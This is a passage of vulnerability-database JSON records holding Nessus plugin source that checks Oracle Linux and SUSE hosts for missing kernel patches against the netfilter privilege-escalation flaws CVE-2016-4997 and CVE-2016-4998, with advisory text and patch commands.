"ORACLELINUX_ELSA-2016-3619.NASL", "href": "https://www.tenable.com/plugins/nessus/93678", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory 
ELSA-2016-3619.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93678);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3619)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[4.1.12-61.1.10.el7uek]\n- netfilter: x_tables: make sure e->next_offset covers remaining blob \nsize (Florian Westphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian \nWestphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n\n[4.1.12-61.1.9.el7uek]\n- xen-blkback: don't get ref for each queue (Bob Liu) [Orabug: \n24616917] - NVMe: Fix obtaining command result (Keith Busch) [Orabug: \n24655742]\n\n[4.1.12-61.1.8.el7uek]\n- Revert 'ixgbe: make a workaround to tx hang issue under dom' (Brian \nMaly) [Orabug: 24618738]\n\n[4.1.12-61.1.7.el7uek]\n- x86/xen: Add x86_platform.is_untracked_pat_range quirk to ignore ISA \nregions. 
(Konrad Rzeszutek Wilk) [Orabug: 24566046]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006353.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006354.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.10.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.10.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-4997\", \"CVE-2016-4998\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-3619\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-4.1.12-61.1.10.el6uek-0.5.3-2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", 
reference:\"kernel-uek-devel-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-61.1.10.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-61.1.10.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-4.1.12-61.1.10.el7uek-0.5.3-2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-61.1.10.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-61.1.10.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-61.1.10.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-61.1.10.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-61.1.10.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-61.1.10.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:17", 
"description": "The SUSE Linux Enterprise 12 GA kernel was updated to receive one\ncritical security fix.\n\nSecurity issue fixed :\n\n - CVE-2016-4997: A buffer overflow in 32bit\n compat_setsockopt iptables handling could lead to a\n local privilege escalation. (bsc#986362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-29T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1710-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-08-29T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-devel"], "id": "SUSE_SU-2016-1710-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93172", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory 
SUSE-SU-2016:1710-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93172);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1710-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 GA kernel was updated to receive one\ncritical security fix.\n\nSecurity issue fixed :\n\n - CVE-2016-4997: A buffer overflow in 32bit\n compat_setsockopt iptables handling could lead to a\n local privilege escalation. (bsc#986362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=986362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4998/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161710-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec7ab8a7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-1013=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2016-1013=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-1013=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-1013=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-1013=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-1013=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 
Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/03\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debugsource-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-devel-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-syms-3.12.60-52.54.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", 
reference:\"kernel-default-debugsource-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.60-52.54.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.60-52.54.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.60-52.54.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:17", "description": "The SUSE Linux Enterprise 12 kernel was updated to receive critical\nsecurity and bugfixes.\n\nSecurity issue fixed :\n\n - CVE-2016-4997: A buffer overflow in 32bit\n compat_setsockopt iptables handling could lead to a\n local privilege escalation. (bsc#986362)\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-29T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:1709-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-08-29T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-devel"], "id": "SUSE_SU-2016-1709-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93171", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1709-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93171);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : 
kernel (SUSE-SU-2016:1709-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 kernel was updated to receive critical\nsecurity and bugfixes.\n\nSecurity issue fixed :\n\n - CVE-2016-4997: A buffer overflow in 32bit\n compat_setsockopt iptables handling could lead to a\n local privilege escalation. (bsc#986362)\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971770\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=986362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4998/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161709-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4765b682\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise 
Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-1012=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-1012=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-1012=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-1012=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-1012=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-1012=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux 